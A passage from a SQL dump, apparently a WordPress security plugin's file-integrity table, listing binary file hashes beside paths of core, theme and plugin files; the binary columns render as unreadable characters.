�y6xE�/\n<�0��','',0,'?'),('��i����z�k�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?,5}�C!��K���','=,do �`F�Tl���a�Ԋ	�,�B��','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�v\"}	�H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱��	-���f�rǏc�k��@�3�`	=','',0,'?'),('���Bb&�q���','wp-content/themes/simpleshift/assets/js/scrollReveal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+Ȃ�\"�]��\n=��','2*��?O&�G��B�g3�J���D]��L0��g�','',0,'?'),('�B��pB�)Q���܏�','wp-content/themes/chronus/inc/customizer/sections/customizer-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\"�x\Z2qF�/�K','	-����Z�\\����Ż�솮-b�e���e�','',0,'?'),('�\n`m�H�I�i�M�','wp-content/themes/twentynineteen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4�\Z���M��y','_{��g�g�|n�%�e��~�����sCi���B','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H	��G\n�;=','',0,'?'),('�*�c(Cx�z\r/7fm�,','wp-content/themes/university-hub/inc/helper/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C>\06�\0I�d8����','���yA�\\�3��.��cI��S���}�.D��','',0,'?'),('�A�N��5��?��\"?%�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lԍ����Z��2gu','z6�Up�^$(J,m]��y�v*�(��\r�t�','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�F�8H��I�ִ�D;8','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�u���m�F�p���','��d���}��;�9T���$��\'tEj�(]','',0,'?'),('�Z���L&;@ÇUS��;','wp-content/themes/auberge/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<v��D�lpu%�/�֔','�����)A ��t�S��fUB�2�Ė�\n���','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('�i�kn<�s�n�⮤D�','wp-content/themes/the-best/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ix�X�o\\~��','��k�}�>�2��Z����H>���?�$��v','',0,'?'),('�u��<����~-\'��','wp-content/themes/advance/js/unminified/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\Z�%�\\C>|\Z�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('�y�g:i�L�J���L','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/bin/compress',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a1b�+ݴ�N�%s','���=��}�0�X�ډ�mbQ����`��q','',0,'?'),('�|%��uG(�\\YL]t�','wp-content/themes/saybusiness/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';\\���7QZt���X','f������v\\)��Y��,n�(\Zt?W�m��D','',0,'?'),('�|����kR��ʕ�','wp-content/themes/graduate/assets/js/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ޤd�f����lI','��H���0���	�v�u@�[�x`�����-','',0,'?'),('�i�3ե��{Pc�Y','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/textile/textile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����/�\Z[9}��','|�\Z���j�m��Մ&~MS�p���^9r���c','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('�\rI�C�eXl�c','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�Q�jB/��D�^3��','�$�%!s`�\n�Z�dS�tEh�ಖ\'�^�Չ��','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('�6�F��J�->\"��','wp-content/themes/wp-simple/assets/images/preview/750x500-8.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�~���3�(��+S','L>>V]���e�\Z�n��^��`����IrV�i�','',0,'?'),('�Vť���0��A��','wp-content/themes/catch-flames/inc/panel/images/arrow-light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�i�IGk�����','�nqccU�&s���2�ǫ<�>�2�z�','',0,'?'),('繢	n��f�mPkR','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/edit/closetag.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^(�5���:���','AC�QS),�������\Z[��nڪ�t��VE�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pgG��&�3�,�','S����<�`�J��=�4mS�\"kY��Mׂҡ�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('�����9�)�]O�f','wp-content/themes/hitmag/inc/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��<���g�m��N','{4�	�\"-	v]�F���*Ş( <�ߔh�É>','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��ٳ���v�2.','�ڷ���Rkd�NZ��h��V�\r�<p���=1','',0,'?'),('��M�����n�$hK�?','wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5\0tDx�PRd��<5','�Q�{���)}#��O�@��\\u>l���YՅ','',0,'?'),('��sF�um���Ą��','wp-content/themes/weblog/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�VJ\0\'֟��,','z�E3�!3��wS|�	��ήY@q�U\n�*1G','',0,'?'),('��}�Woc�x�J�7��','wp-content/themes/advance/inc/kirki/includes/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u>�B���m��}��5�','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('�\rD7$����5Ćd=\n','wp-content/themes/hitmag/inc/kirki/assets/css/customizer.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\\fN�m?�n=���','^��}v�d�g�w�9�(o8x�RE?�%�<�','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�,��u*��^�FG	/','wp-content/themes/graphene/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uV;�i�]p��\"v�&�','-諃�ɘ�Y�CvK8��(%b�vό�d��¶�','',0,'?'),('�/�D���C��3��=�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����qQR	�X?\Z�B','M430��+?�ŎkV.a��ˀ<\n�����N�!','',0,'?'),('�1\Z��J,�5\nNO�e�x','wp-content/themes/graduate/assets/uploads/testimonial-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����q��3�x�','�urDa�ξ�GcG���ߕfv�+#���Pþ','',0,'?'),('�1��CG3@��n���','wp-content/themes/graduate/inc/customizer/theme-options/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o_��7��^a��˸s','-lP��i�k�dV]��vy!�(�J�)o&\n��V','',0,'?'),('�<[e?U�ը��]fC','wp-content/themes/university-hub/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K3�\rƇ��<D�dpa�','��֎P-��=���ͺe^����-!�L�y','',0,'?'),('�Dmɶ�p�_�r� ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/xq-light.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��m���u*&��\"','�@x��+�B�{Yy\0��ɻ<]쌤4E]Ņ7��','',0,'?'),('�E\"T�9�]��6��he-','wp-content/themes/graphene/template-twocolumnsleft.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���hB�9A�)`��','��\'cS��Sa�[��{h��mݨ�Dѭ:�\0','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�Y̅�DoU��fg','wp-content/themes/catch-responsive/inc/catchresponsive-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�XD+��H��1T��\n�','FU�)o*m?�K�-�8 a.^��kw�[�]]�]�','',0,'?'),('�^)j�C�.3?�=','wp-content/themes/monograph/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X<�[FN���<2�؏͏','�S�s���U�&!��uѾ05\'�zE��\"���','',0,'?'),('�a%Fִa�W$���2','wp-content/themes/chronus/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��w�dk�]]�bYK','V��h#ᘜ���I,�h,�srw\n6�1�W��','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�j>�JnM7\\C','wp-content/themes/monograph/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��j�\r?���:','v� 	[�#�N����h]ylI�\0�ְ�[<�\r\'','',0,'?'),('�q����E�+�X��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@n-��N4� �`G','i��5.��;�W)��?8\n�|K�VMKH��','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�B���a,�����','wp-content/themes/Kent/searchform.php',0,'�t��>�xC�: ��v','�t��>�xC�: ��v','dh=��Q4\'�h?;u�&\'�ŗ��EdA5','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�D�8rnlU��','�U����2��#d�{���3��E8���U�','',0,'?'),('�+�S��dS�\\ݠ','wp-content/themes/event/inc/js/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VO����]���V{\r','�\n�Ϭ���b�s���QȨ-}$��1��h�','',0,'?'),('��)�(�`�f.U�M��','wp-content/themes/education-hub/inc/customizer/sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�U���`@��;)�F','��K8A�6N^0z�0���!X�c��߿J','',0,'?'),('��Dg�[�])-Ϟ�\r','wp-content/themes/newsmag/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��݁@T~��f��','�&��ı�ÒM�)\r��9]�������o�','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','��	�<�(*Wv���Ћtw��r_��t�i�	','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('��21\'=P�σ�.��','wp-content/themes/event/inc/front-page/our-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p۬�笩4�8��e','ܦ�Vc��#?e����S��e��i��G�U��','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�v��t��(4V','���a��_��Lx�c$��tU�v�����%��','',0,'?'),('���[��}��(x4`��','wp-content/themes/catch-flames/changelog.txt',0,'u��A�t:/��Q���','u��A�t:/��Q���','%�v_#��*\Z���j�@JI��?B^���.','',0,'?'),('����ìo����','wp-content/themes/singularity/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0I@��%�&�7k','z���]�娿��t3ҫ�u<��,�:C�d��','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�a�ЅFƭoz�=�&','wp-content/themes/graphene/js/PIE.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ծ<B�f}:��T�','?���<M��L5�|�`�5bo��߬b�\'fs�','',0,'?'),('�W��j��X�\ZT �','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-scripts-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�w_�_D��C��c�m\\','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�����	��R|�c�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/lib/codemirror.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���y+<~��q0���`','2I�k��Ӄ�&_��yj>w(�p�I�J[��','',0,'?'),('�\"�e��–AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_	ܹ k��\rP�`�8�c�','',0,'?'),('�#N�*?^�Qt���','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/javascript/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٺĠ`58��%�#','�LZV�2H:,%�F�8����\0��2�K�h�o��','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�N�.a��v�\r�:���','wp-content/themes/skt-pathway/css/tablet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I����o��9k�','<�Pk�&ɫ4��[�h\n�V�=\"`��M','',0,'?'),('�Sd؟wݒ�+%���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԕ��_,�J`*\rO��y','p	8M��0���?H�fM�����\0}v�K����','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6*pO��,ё� -X�','�4|ǛD}c�Hd�Ɖ)Y[�q�K���-�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j0�P�3#��','!K~�f���nN��B��\0��.@�K�U�','',0,'?'),('�_�\\��v��\'c�','wp-content/themes/brickyard/images/pattern-headline.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�8Op���Ѭ9 ','�8��#SuS�	f�o},�_;��aJD4<� �','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	�\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('�ipm���	V���','wp-content/themes/graphene/images/social/google-plus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n!���\'� A�','�A�w����VW2��W�˾������y�`�/','',0,'?'),('�u��x�#�Hy:I�Av','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e���	�Fs�','���L>�.\\c3h���>����U���NT�Z','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('郒����̺`4w9��','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',v&ne��._C>�H','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('��!����(���','wp-content/themes/wp-simple/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��r�0nZ�*���D','@W/)�:��H�r|�Ȍ��\'�3wʹ�s','',0,'?'),('�[]AdF({T���<','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/AUTHORS',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2OJSIܑ��68Ѻc	','��QG�l0͆�^��7ȉ8�;ET��!_upB','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�\'����>�Y�','�b*/��m/���a�ŵ�>��I湒h��+','',0,'?'),('騚5FX\r!�P)��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�`]�-����F��','��uH�VD��8���I1��N\"Ll�R�����','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('��@M{\Z.��L���','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a͐��\r����','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('���oZ�J\Z�7U���q�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/lint',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IﳡG�g�V�A�Jִ','�4}����Z2�!�|~T#�z�)�4!����&AQE�','',0,'?'),('�	�1_E�67���','wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a|2]�e�\"$9z�','\0�Ó\rƱ6� �,�J	��!d7���n��h��','',0,'?'),('�U���b�f܌�`g','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[m�L̉Ȗ�j#�D','�����ۚr(o�Ek\"+/bW/r���p��1','',0,'?'),('�kLN\0��x6@','wp-admin/css/list-tables.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UݪAcT�g�@��{N','�XAݸ.`Q��rC����w@�4b�X���ϭ�	','',0,'?'),('�-.��x�ɤ�R��','wp-admin/includes/privacy-tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�/��nC�0^`���','Y\'C5�\'g�u���**Ƭy�%R(�T�S����','',0,'?'),('�0J����fx�#X{�','wp-includes/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�m�w�/�\\�y5�','�ɐt�d7�H�}=��.t��Cw$�`c��\'�','',0,'?'),('�4���2�)A.;4�','wp-includes/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Q	�!�@�٧T\r','	�Z\\L���\'b�%�i$���\Z\n���F�~','',0,'?'),('�J���SQ;Cqn�\nt�','wp-content/themes/auberge/includes/plugins/beaver-builder/beaver-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��᜜�S.�ƲY��u','d:��*����Fc�j8���{\r\Z��&��}\r','',0,'?'),('�Q�A�	�=H��7-','wp-includes/js/jquery/ui/droppable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('�cz͢�p�b���I\r','wp-content/themes/university-hub/css/metabox.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dΆ��	喑��','l��������Y7悢����RA�&n��^�Q3','',0,'?'),('�d\n�v;�O1:���,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\Z����w�d6[�','!��yq�� �����	������#ҝ;\'','',0,'?'),('�r@��D��Z�䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('ꍥ��2jEbg؈W�x�','wp-includes/css/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('ꐏF�rH�}@$bF��-','wp-content/plugins/wp-cerber/assets/flags/dz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}����Z�A���','~\n����Ào�\'�x�\0��Xh.��}���%�','',0,'?'),('�z-l����Ll&��','wp-content/themes/newsmag/assets/vendors/adsenseloader/jquery.adsenseloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ۿH�)H3 ��','����g�e���c;�ؘ緻��۔f8-�','',0,'?'),('�&�%ؗ�\\�v�ܠ3','wp-content/themes/wp-simple/inc/kirki/assets/css/hint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�~�O �>?cZJ�','wp-content/themes/brickyard/images/icon-google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��i���G�\Z���','��6����C\\c��I�Y�\n|��!M��wA��7','',0,'?'),('�LJ���4˓T`�k','wp-includes/js/wp-pointer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('꽀F����,�\\e�[','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_slider.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rm!��N��I�S�,�','�	�U�W�\"��`��#r�,�<�Wz�i”ˑ�','',0,'?'),('���`I��,�y o�Y','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��8e_�T��ƽW','ݬ�IS�P\"�a�� 7J�6�QSv���_��y�','',0,'?'),('�� �o��JZ�f�\Z�C','wp-content/themes/simpleshift/assets/images/search_icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*������UE0Wr','����$�M��K�\r�z�Gj�Y4|�\r�+-0��','',0,'?'),('��*�-�$�f���J','wp-content/themes/graphene/js/buttons/important.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��-���O���	ڐ�','�d���,M]�!���h\Z�e�ea�r`��m�','',0,'?'),('�靱�ृ�S^�yݲ','wp-content/themes/singularity/js/zoom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oE���c��caK��','�\\Q~��s�V�����\nx�k�R����','',0,'?'),('��A��LDc~��M!]','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L+��r�E�j���(?','��M������;2h�%�~�!_�myt��;b','',0,'?'),('��{Z�(C��+:)JP','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r���s�)g?','sj��	6��V`f�\'jҧ��� �~I�nR','',0,'?'),('��6�Z�fM���;�','wp-admin/css/site-health-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˈ0@�8�����_B','�r�dy��#�G޿����}����ZӦtwW�S','',0,'?'),('������\r<��I','wp-content/themes/wp-simple/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%����5��x/���','m�G4���L��u#j��D�r(��H��','',0,'?'),('�	��h�,>��@','wp-content/themes/education-hub/inc/customizer/callback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������m��R��','���P.�S�	$4��2�d+��)��_A�c�n','',0,'?'),('����d�94u^yJ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zk���G2��\n�g�O��','Z���\n����Km���}-��7��z��\"t	